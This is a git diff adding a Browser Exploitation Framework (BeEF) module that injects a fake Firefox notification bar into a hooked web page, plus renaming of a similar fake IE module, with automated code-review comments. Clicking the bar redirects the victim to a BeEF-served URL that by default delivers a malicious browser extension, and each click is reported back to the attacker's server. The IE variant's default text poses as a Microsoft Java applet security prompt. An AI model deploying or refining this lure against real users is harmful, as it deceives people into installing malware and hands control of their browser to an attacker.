diff --git a/modules/social_engineering/fake_notification_ff/command.js b/modules/social_engineering/fake_notification_ff/command.js
new file mode 100644
index 000000000..5bb0b7744
--- /dev/null
+++ b/modules/social_engineering/fake_notification_ff/command.js
@@ -0,0 +1,36 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+ var id = beef.dom.generateID();
+ var pid = beef.dom.generateID();
+ var zztop = beef.dom.getHighestZindex()+1;
+ var el = beef.dom.createElement('div',{'id':id,'style':'width:100%; position:fixed; top:0px; left:0px; margin:0; padding:0px 20px 0px 20px; z-index:'+zztop+'; border-bottom:1px solid black; background:#fbe99a; display:none;'});
+ var ell = beef.dom.createElement('div',{'style':'width: 16px; height: 18px; padding: 0; margin: 3px 0px 5px 5px; position: absolute; left: 0px; top: 0px; background-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABcAAAAWCAIAAACkFJBSAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAK3SURBVDhPpZD7T1JhHMbPn1NbrdvKmpmtieJdyBuCXA/e8IJRDtOJiEpkNUzEG6QCivWDrlroxDnNbtqWzqwxMZU0jyDayi6uA1vfRF/PUn9i++zsOS/P8+EFzL/xKHgw/8bDw/CtH/rRfxPMD9UD6CEcrY+t8vEh9eay+ZDO3hAs1v38Isy6O1nnQ47Hx4RODGsO7FAPwdK9ny13d0dLKSOJXiDhLs6YDuxQDzG/twsx+Vxj7ysfsylf9Kssxoq8HN6t6uLJsXtvh2vh8PWg6pvLSO2jjPm8lh3WLMqbvNMnjwJnzxyjR4ZzOSlXGdF02oVLoSdPnTjCSLjsfHd/r4+GXgtYzAHINXNVRV58bAQjkZ7MjGWzmLiQnclOhteEOBogyWG73jejPjVgvjVTANLTqVZJYZmbzReLODlZPAjwDCASZMik+OK0fmFK65ltgjIaQgBLB+JZn66nq2looOf6tVwkAlfAy2Uz61RCLuuKQp5KOHTUIVjaET+I3p/uJ+R6r9WshUsFrhMgW8xlpSVFR4WHh52LooXOvNJQh5jP04542a94M6hcnqmvqykQ8NLh+7PwTNiDBQJc0G7r1KjLGuur3E4DdQgWYwDSbczFk+LoIRI8hpkYKeSny0sKbsgkYhEbFPCsKCv84jBtrg5uErZ/f8ruEAJGegw7uA0qRX4ULSwy4mJaSry+oXbBYf84ZVNXl+LCDLAU5fPnp7Sk58E2u6vtgJHuNoTJUMnlJAt4abDp7a78vdK26tDfrpGKBCwQCfmpjok6ah9lsLQiRge0JbI8+P3FRWLdXal3TjduV/I4DGkhriiXqavlrukGah9ljFxtQXxfti7NDS/NjXx2jhCfnm6tGL+6umY/jLico8T8kGexf4top/ZRBktz8IBFHzwYSTQGD/aHaAwesDQEz1/qC1RvBXP1zgAAAABJRU5ErkJggg==);'});
+ var elr = beef.dom.createElement('div',{'style':'width: 8px; height: 8px; padding: 0; margin: 7px 50px 5px 0px; position: absolute; right: 0px; top: 0px; background-image: url(data:image/png;base64,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);'})
+ var elp = beef.dom.createElement('div',{'id':pid,'style':'margin: 2px 50px 0 4px; height: 25px; line-height: 25px; font-family: sans-serif; font-size: 12px; padding-bottom: 5px'});
+ $j('body').append(el);
+ var hid = '#'+id;
+ var hpid = '#'+pid;
+ $j(hid).append(elp);
+ $j(hpid).html("<%= @notification_text %>
");
+ $j(hid).append(ell);
+ //$j(hid).append("Problems installing? ");
+ $j(hid).append(elr);
+ $j(hid).click(function() {
+ $j(this).slideUp(300,function() {
+ $j(this).remove();
+ });
+ window.location = '<%= @url %>';
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=User has clicked the notification');
+ });
+ $j(hid).css('cursor','pointer');
+ $j(hid).slideDown(300,function() {
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Notification has been displayed');
+ });
+
+});
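Review bot: `<%= @notification_text %>` and `<%= @url %>` are substituted raw into JavaScript string literals (the `.html("…")` call and the `window.location = '…'` assignment), so a quote, backslash or line break in either configured value produces a script that no longer parses. The values should be encoded as JavaScript strings on the Ruby side before substitution. Since the option is described as text, `$j(hpid).text(...)` instead of `.html(...)` would keep the value from being parsed as markup. Separately, the `var elr = …` declaration is missing its terminating `;`, and the commented-out `append("Problems installing? ")` line can be removed.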
diff --git a/modules/social_engineering/fake_notification_ff/config.yaml b/modules/social_engineering/fake_notification_ff/config.yaml
new file mode 100644
index 000000000..a501a37aa
--- /dev/null
+++ b/modules/social_engineering/fake_notification_ff/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ fake_notification_ff:
+ enable: true
+ category: "Social Engineering"
+ name: "Fake Notification Bar (Firefox)"
+ description: "Displays a fake notification bar at the top of the screen, similar to those presented in Firefox. If the user clicks the notification they will be prompted to download a malicious Firefox extension (by default)."
+ authors: ["xntrik", "bcoles"]
+ target:
+ user_notify: ['ALL']
diff --git a/modules/social_engineering/fake_notification_ff/img/install.png b/modules/social_engineering/fake_notification_ff/img/install.png
new file mode 100644
index 000000000..fb44d07a6
Binary files /dev/null and b/modules/social_engineering/fake_notification_ff/img/install.png differ
diff --git a/modules/social_engineering/fake_notification_ff/img/jigsaw.png b/modules/social_engineering/fake_notification_ff/img/jigsaw.png
new file mode 100644
index 000000000..74d3c2f8e
Binary files /dev/null and b/modules/social_engineering/fake_notification_ff/img/jigsaw.png differ
diff --git a/modules/social_engineering/fake_notification_ff/img/plugins.png b/modules/social_engineering/fake_notification_ff/img/plugins.png
new file mode 100644
index 000000000..73104156c
Binary files /dev/null and b/modules/social_engineering/fake_notification_ff/img/plugins.png differ
diff --git a/modules/social_engineering/fake_notification_ff/module.rb b/modules/social_engineering/fake_notification_ff/module.rb
new file mode 100644
index 000000000..fba9d4154
--- /dev/null
+++ b/modules/social_engineering/fake_notification_ff/module.rb
@@ -0,0 +1,32 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Fake_notification_ff < BeEF::Core::Command
+
+ def self.options
+ @configuration = BeEF::Core::Configuration.instance
+ beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
+ url = 'http://' + beef_host + ':' + @configuration.get("beef.http.port") +'/api/ipec/ff_extension'
+ return [
+ {'name' => 'url', 'ui_label' => 'Plugin URL', 'value' => url, 'width'=>'150px'},
+ { 'name' => 'notification_text',
+ 'description' => 'Text displayed in the notification bar',
+ 'ui_label' => 'Notification text',
+ 'value' => "An additional plug-in is required to display some elements on this page."
+ }
+ ]
+ end
+
+ #
+ # This method is being called when a zombie sends some
+ # data back to the framework.
+ #
+ def post_execute
+ content = {}
+ content['result'] = @datastore['result']
+ save content
+ end
+
+end
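Review bot: In `self.options` the default URL is built with `'http://' + beef_host + ':' + @configuration.get("beef.http.port") + …`, which raises a TypeError if the configured port comes back as an Integer rather than a String (the config value's type is not visible in this diff). String interpolation avoids that: `url = "http://#{beef_host}:#{@configuration.get('beef.http.port')}/api/ipec/ff_extension"`. The scheme is also fixed to `http` whatever the server's own configuration is, so the default link may not match a TLS-enabled deployment. `@configuration` is only read inside this method and could be a local variable, and `self.options` has no comment describing the two options it returns, unlike `post_execute`.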
diff --git a/modules/social_engineering/fake_notification/command.js b/modules/social_engineering/fake_notification_ie/command.js
similarity index 100%
rename from modules/social_engineering/fake_notification/command.js
rename to modules/social_engineering/fake_notification_ie/command.js
diff --git a/modules/social_engineering/fake_notification/config.yaml b/modules/social_engineering/fake_notification_ie/config.yaml
similarity index 64%
rename from modules/social_engineering/fake_notification/config.yaml
rename to modules/social_engineering/fake_notification_ie/config.yaml
index fb4ccf970..25604d287 100644
--- a/modules/social_engineering/fake_notification/config.yaml
+++ b/modules/social_engineering/fake_notification_ie/config.yaml
@@ -5,11 +5,11 @@
#
beef:
module:
- fake_notification:
+ fake_notification_ie:
enable: true
category: "Social Engineering"
- name: "Fake Notification"
- description: "Displays a fake notification at the top of the screen, similar to those presented in IE."
+ name: "Fake Notification Bar (IE)"
+ description: "Displays a fake notification bar at the top of the screen, similar to those presented in IE."
authors: ["xntrik"]
target:
user_notify: ['ALL']
diff --git a/modules/social_engineering/fake_notification/module.rb b/modules/social_engineering/fake_notification_ie/module.rb
similarity index 86%
rename from modules/social_engineering/fake_notification/module.rb
rename to modules/social_engineering/fake_notification_ie/module.rb
index c169f99a5..ff55ea7d5 100644
--- a/modules/social_engineering/fake_notification/module.rb
+++ b/modules/social_engineering/fake_notification_ie/module.rb
@@ -3,13 +3,13 @@
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
-class Fake_notification < BeEF::Core::Command
+class Fake_notification_ie < BeEF::Core::Command
def self.options
return [
{ 'name' => 'notification_text',
'description' => 'Text displayed in the notification bar',
- 'ui_label' => 'Text displayed in the notification bar',
+ 'ui_label' => 'Notification text',
'value' => "This website wants to run the following applet: \\'Java\\' from \\'Microsoft Inc\\'. To continue using this website you must accept the following security popup"
}
]